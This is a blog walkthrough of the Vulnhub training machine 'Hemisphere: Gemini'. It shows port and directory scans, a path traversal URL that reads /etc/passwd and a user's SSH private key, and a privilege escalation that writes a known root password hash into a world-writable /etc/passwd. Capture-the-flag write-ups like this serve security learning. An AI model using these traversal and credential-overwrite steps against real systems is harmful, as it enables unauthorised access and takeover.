Hemisphere : Gemini Vulnhub Walkthrough
Today, I will be sharing a walkthrough of Hemisphere : Gemini which is a boot2root machine available on Vulnhub. This machine is rated easy and good for beginners.
data:image/s3,"s3://crabby-images/4d431/4d4312732472799be6e40e93893d76e60eb1b95f" alt="Hemisphere : Gemini Vulnhub Walkthrough"
Initial Enumeration and User Shell
I started the enumeration by running a port scan using nmap to look for open ports and default scripts.
┌──(madhav㉿anton)-[~/Documents/vulnhub/gemini]
└─$ nmap -A -oA nmap/initial 192.168.1.132
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-19 15:13 IST
Nmap scan report for 192.168.1.132
Host is up (0.00073s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 a3:38:0e:b6:a1:b8:49:b1:31:a0:43:3e:61:c3:26:37 (RSA)
| 256 fc:40:6c:0b:7b:f0:03:6e:2e:ef:2d:60:b5:96:01:b6 (ECDSA)
|_ 256 90:ed:89:27:9d:65:ea:80:54:79:65:af:2c:d7:80:43 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Gemini Corp
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
Service Info: Host: GEMINI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
We have many different ports open. I started the enumeration with port 80 first. Let's open our web browser and see what we have on port 80.
data:image/s3,"s3://crabby-images/54823/54823a1b3af251455bf1ccd65e4c220fc1f0a42c" alt=""
There was not much functionality on the website, so I performed a gobuster scan to look for hidden directories.
┌──(madhav㉿anton)-[~/Documents/vulnhub/gemini]
└─$ gobuster dir -u http://192.168.1.132 -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.132
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2020/11/19 15:19:41 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 315] [--> http://192.168.1.132/images/]
/assets (Status: 301) [Size: 315] [--> http://192.168.1.132/assets/]
/Portal (Status: 301) [Size: 315] [--> http://192.168.1.132/Portal/]
/server-status (Status: 403) [Size: 278]
===============================================================
2020/11/19 15:21:00 Finished
===============================================================
We have another website running in the /Portal directroy.
data:image/s3,"s3://crabby-images/5c847/5c847b4e79622af8198f508c464440e3ce516c24" alt=""
After some enumeration, I saw that SOBRE NOSOTROS
page is displaying about-us.html
using the ?view=about-us.html
parameter.
I visited the following URL and I was able to view the content of /etc/passwd.
http://192.168.1.132/Portal/index.php?view=../../../../../etc/passwd
data:image/s3,"s3://crabby-images/c4a14/c4a14bcc8f61099d7e082c7a08720e56307db430" alt=""
We found a username william. Next I tried to read the .ssh/id_rsa
in the home directory of user william using the same technique.
data:image/s3,"s3://crabby-images/bb2e0/bb2e037f1d361bbb6148a3c0c94f337964945bd4" alt=""
I saved this into a file, gave the correct permissions and then logged in as user william via ssh.
┌──(madhav㉿anton)-[~/Documents/vulnhub/gemini]
└─$ nano id_rsa
┌──(madhav㉿anton)-[~/Documents/vulnhub/gemini]
└─$ chmod 600 id_rsa
┌──(madhav㉿anton)-[~/Documents/vulnhub/gemini]
└─$ ssh -i id_rsa william@192.168.1.132
Linux gemini 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64
william@gemini:~$
After logging in, we can read our first flag present in the home directory.
data:image/s3,"s3://crabby-images/f3570/f3570c9b2e8a6d7fa94093bb6d9758a7ac415f5a" alt=""
Root Shell
For further enumeration, I used linpeas.sh and found that /etc/passwd
is world writable.
data:image/s3,"s3://crabby-images/56329/56329934e680e6d5374179f164f444e555fd5f8f" alt=""
This is a 99% PE Vector. By exploiting this, we can modify the password for user root. First of all I generated a password hash using the following command:
┌──(madhav㉿anton)-[~]
└─$ openssl passwd -1 -salt root toor
$1$root$Q9ba8miZPPt/iPb0Mv.gq/
Next, I added this hash in /etc/passwd
for user root.
root:$1$root$Q9ba8miZPPt/iPb0Mv.gq/:0:0:root:/root:/bin/bash
After saving the file, we can simply use the password toor
to login as user root and read the root flag!
data:image/s3,"s3://crabby-images/d79e5/d79e5a533fc4db941c47db2a83dae28a508bfddf" alt=""
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Luis Javier Franco.